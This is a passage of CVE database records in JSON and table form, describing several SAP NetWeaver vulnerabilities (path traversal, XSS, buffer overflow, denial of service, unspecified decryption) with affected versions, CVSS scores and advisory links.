"dateUpdated": "2024-08-04T08:55:22.130Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-29186
Vulnerability from cvelistv5
Published
2023-04-11 03:08
Modified
2024-08-02 14:00
Severity ?
EPSS score ?
Summary
In SAP NetWeaver (BI CONT ADDON) - versions 707, 737, 747, 757, an attacker can exploit a directory traversal flaw in a report to upload and overwrite files on the SAP server. Data cannot be read but if a remote attacker has sufficient (administrative) privileges then potentially critical OS files can be overwritten making the system unavailable.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP | NetWeaver (BI CONT ADDON) |
Version: 707 Version: 737 Version: 747 Version: 757 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T14:00:15.983Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3305907"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "NetWeaver (BI CONT ADDON)",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "707"
},
{
"status": "affected",
"version": "737"
},
{
"status": "affected",
"version": "747"
},
{
"status": "affected",
"version": "757"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eIn SAP NetWeaver (BI CONT ADDON) - versions 707, 737, 747, 757, an attacker can exploit a directory traversal flaw in a report to\u00a0upload and overwrite files on the SAP server. Data cannot be read but if a remote attacker has sufficient (administrative) privileges then potentially critical OS files can be overwritten making the system unavailable.\u003c/p\u003e"
}
],
"value": "In SAP NetWeaver (BI CONT ADDON) - versions 707, 737, 747, 757, an attacker can exploit a directory traversal flaw in a report to\u00a0upload and overwrite files on the SAP server. Data cannot be read but if a remote attacker has sufficient (administrative) privileges then potentially critical OS files can be overwritten making the system unavailable.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-04-11T20:17:30.169Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://launchpad.support.sap.com/#/notes/3305907"
},
{
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Directory/Path Traversal vulnerability in SAP NetWeaver.",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2023-29186",
"datePublished": "2023-04-11T03:08:49.584Z",
"dateReserved": "2023-04-03T09:22:43.157Z",
"dateUpdated": "2024-08-02T14:00:15.983Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-1910
Vulnerability from cvelistv5
Published
2016-01-15 20:00
Modified
2024-08-05 23:10
Severity ?
EPSS score ?
Summary
The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290.
References
| ▼ | URL | Tags |
|---|---|---|
| http://seclists.org/fulldisclosure/2016/Apr/60 | mailing-list, x_refsource_FULLDISC | |
| http://www.securityfocus.com/bid/80920 | vdb-entry, x_refsource_BID | |
| https://erpscan.io/advisories/erpscan-16-003-sap-netweaver-7-4-cryptographic-issues/ | x_refsource_MISC | |
| https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/ | x_refsource_MISC | |
| https://www.exploit-db.com/exploits/43495/ | exploit, x_refsource_EXPLOIT-DB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:10:40.379Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20160416 [ERPSCAN-16-003] SAP NetWeaver 7.4 - cryptographic issues",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Apr/60"
},
{
"name": "80920",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/80920"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-16-003-sap-netweaver-7-4-cryptographic-issues/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"name": "43495",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/43495/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20160416 [ERPSCAN-16-003] SAP NetWeaver 7.4 - cryptographic issues",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Apr/60"
},
{
"name": "80920",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/80920"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-16-003-sap-netweaver-7-4-cryptographic-issues/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"name": "43495",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/43495/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1910",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20160416 [ERPSCAN-16-003] SAP NetWeaver 7.4 - cryptographic issues",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Apr/60"
},
{
"name": "80920",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/80920"
},
{
"name": "https://erpscan.io/advisories/erpscan-16-003-sap-netweaver-7-4-cryptographic-issues/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-16-003-sap-netweaver-7-4-cryptographic-issues/"
},
{
"name": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/",
"refsource": "MISC",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"name": "43495",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/43495/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1910",
"datePublished": "2016-01-15T20:00:00",
"dateReserved": "2016-01-15T00:00:00",
"dateUpdated": "2024-08-05T23:10:40.379Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-7364
Vulnerability from cvelistv5
Published
2014-04-10 15:00
Modified
2024-09-16 19:41
Severity ?
EPSS score ?
Summary
An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver does not properly restrict access, which allows remote attackers to read and write to arbitrary files via unknown vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://archives.neohapsis.com/archives/bugtraq/2013-02/0133.html | mailing-list, x_refsource_BUGTRAQ | |
| https://service.sap.com/sap/support/notes/1682613 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://www.onapsis.com/get.php?resid=adv_onapsis-2013-004 | x_refsource_MISC | |
| http://www.onapsis.com/research-advisories.php | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:01:20.424Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20130222 [Onapsis Security Advisory 2013-004] SAP J2EE Core Service Arbitrary File Access",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-02/0133.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1682613"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.onapsis.com/get.php?resid=adv_onapsis-2013-004"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.onapsis.com/research-advisories.php"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver does not properly restrict access, which allows remote attackers to read and write to arbitrary files via unknown vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2014-04-10T15:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20130222 [Onapsis Security Advisory 2013-004] SAP J2EE Core Service Arbitrary File Access",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-02/0133.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1682613"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.onapsis.com/get.php?resid=adv_onapsis-2013-004"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.onapsis.com/research-advisories.php"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7364",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver does not properly restrict access, which allows remote attackers to read and write to arbitrary files via unknown vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20130222 [Onapsis Security Advisory 2013-004] SAP J2EE Core Service Arbitrary File Access",
"refsource": "BUGTRAQ",
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-02/0133.html"
},
{
"name": "https://service.sap.com/sap/support/notes/1682613",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1682613"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "http://www.onapsis.com/get.php?resid=adv_onapsis-2013-004",
"refsource": "MISC",
"url": "http://www.onapsis.com/get.php?resid=adv_onapsis-2013-004"
},
{
"name": "http://www.onapsis.com/research-advisories.php",
"refsource": "MISC",
"url": "http://www.onapsis.com/research-advisories.php"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7364",
"datePublished": "2014-04-10T15:00:00Z",
"dateReserved": "2014-04-10T00:00:00Z",
"dateUpdated": "2024-09-16T19:41:11.608Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-1965
Vulnerability from cvelistv5
Published
2014-02-14 15:00
Modified
2024-08-06 09:58
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in ISpeakAdapter in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component 3.0, 7.00 through 7.02, and 7.10 through 7.11 for SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to PIP.
References
| ▼ | URL | Tags |
|---|---|---|
| https://exchange.xforce.ibmcloud.com/vulnerabilities/91094 | vdb-entry, x_refsource_XF | |
| http://secunia.com/advisories/56947 | third-party-advisory, x_refsource_SECUNIA | |
| https://erpscan.io/advisories/erpscan-14-006-sap-netweaver-pip-xss/ | x_refsource_MISC | |
| https://service.sap.com/sap/support/notes/1442517 | x_refsource_CONFIRM | |
| http://www.stechno.net/sap-notes.html?view=sapnote&id=1442517 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:15.787Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "netweaver-ispeakadapter-xss(91094)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91094"
},
{
"name": "56947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/56947"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1442517"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.stechno.net/sap-notes.html?view=sapnote\u0026id=1442517"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-01T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in ISpeakAdapter in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component 3.0, 7.00 through 7.02, and 7.10 through 7.11 for SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to PIP."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "netweaver-ispeakadapter-xss(91094)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91094"
},
{
"name": "56947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/56947"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1442517"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.stechno.net/sap-notes.html?view=sapnote\u0026id=1442517"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1965",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in ISpeakAdapter in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component 3.0, 7.00 through 7.02, and 7.10 through 7.11 for SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to PIP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "netweaver-ispeakadapter-xss(91094)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91094"
},
{
"name": "56947",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/56947"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-006-sap-netweaver-pip-xss/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"name": "https://service.sap.com/sap/support/notes/1442517",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1442517"
},
{
"name": "http://www.stechno.net/sap-notes.html?view=sapnote\u0026id=1442517",
"refsource": "MISC",
"url": "http://www.stechno.net/sap-notes.html?view=sapnote\u0026id=1442517"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1965",
"datePublished": "2014-02-14T15:00:00",
"dateReserved": "2014-02-14T00:00:00",
"dateUpdated": "2024-08-06T09:58:15.787Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-10311
Vulnerability from cvelistv5
Published
2017-04-10 15:00
Modified
2024-08-06 03:14
Severity ?
EPSS score ?
Summary
Stack-based buffer overflow in SAP NetWeaver 7.0 through 7.5 allows remote attackers to cause a denial of service () by sending a crafted packet to the SAPSTARTSRV port, aka SAP Security Note 2295238.
References
| ▼ | URL | Tags |
|---|---|---|
| https://erpscan.io/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T03:14:42.973Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-07-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in SAP NetWeaver 7.0 through 7.5 allows remote attackers to cause a denial of service () by sending a crafted packet to the SAPSTARTSRV port, aka SAP Security Note 2295238."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-10311",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in SAP NetWeaver 7.0 through 7.5 allows remote attackers to cause a denial of service () by sending a crafted packet to the SAPSTARTSRV port, aka SAP Security Note 2295238."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://erpscan.io/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-10311",
"datePublished": "2017-04-10T15:00:00",
"dateReserved": "2017-03-30T00:00:00",
"dateUpdated": "2024-08-06T03:14:42.973Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-4015
Vulnerability from cvelistv5
Published
2016-04-14 14:00
Modified
2024-08-06 00:17
Severity ?
EPSS score ?
Summary
The Enqueue Server in SAP NetWeaver JAVA AS 7.1 through 7.4 allows remote attackers to cause a denial of service (process crash) via a crafted request, aka SAP Security Note 2258784.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T00:17:30.807Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-04-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Enqueue Server in SAP NetWeaver JAVA AS 7.1 through 7.4 allows remote attackers to cause a denial of service (process crash) via a crafted request, aka SAP Security Note 2258784."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-4015",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Enqueue Server in SAP NetWeaver JAVA AS 7.1 through 7.4 allows remote attackers to cause a denial of service (process crash) via a crafted request, aka SAP Security Note 2258784."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/",
"refsource": "MISC",
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"name": "https://erpscan.io/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-16-019-sap-netweaver-enqueue-server-dos-vulnerability/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-4015",
"datePublished": "2016-04-14T14:00:00",
"dateReserved": "2016-04-14T00:00:00",
"dateUpdated": "2024-08-06T00:17:30.807Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-38183
Vulnerability from cvelistv5
Published
2021-10-12 14:04
Modified
2024-08-04 01:37
Severity ?
EPSS score ?
Summary
SAP NetWeaver - versions 700, 701, 702, 730, does not sufficiently encode user-controlled inputs, allowing an attacker to cause a potential victim to supply a malicious content to a vulnerable web application, which is then reflected to the victim and executed by the web browser, resulting in Cross-Site Scripting vulnerability.
References
| ▼ | URL | Tags |
|---|---|---|
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983 | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/3084937 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver |
Version: < 700 Version: < 701 Version: < 702 Version: < 730 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T01:37:16.304Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3084937"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "\u003c 700"
},
{
"status": "affected",
"version": "\u003c 701"
},
{
"status": "affected",
"version": "\u003c 702"
},
{
"status": "affected",
"version": "\u003c 730"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver - versions 700, 701, 702, 730, does not sufficiently encode user-controlled inputs, allowing an attacker to cause a potential victim to supply a malicious content to a vulnerable web application, which is then reflected to the victim and executed by the web browser, resulting in Cross-Site Scripting vulnerability."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross Site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-10-12T14:04:07",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/3084937"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2021-38183",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver",
"version": {
"version_data": [
{
"version_name": "\u003c",
"version_value": "700"
},
{
"version_name": "\u003c",
"version_value": "701"
},
{
"version_name": "\u003c",
"version_value": "702"
},
{
"version_name": "\u003c",
"version_value": "730"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP NetWeaver - versions 700, 701, 702, 730, does not sufficiently encode user-controlled inputs, allowing an attacker to cause a potential victim to supply a malicious content to a vulnerable web application, which is then reflected to the victim and executed by the web browser, resulting in Cross-Site Scripting vulnerability."
}
]
},
"impact": {
"cvss": {
"baseScore": "null",
"vectorString": "null",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross Site Scripting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983"
},
{
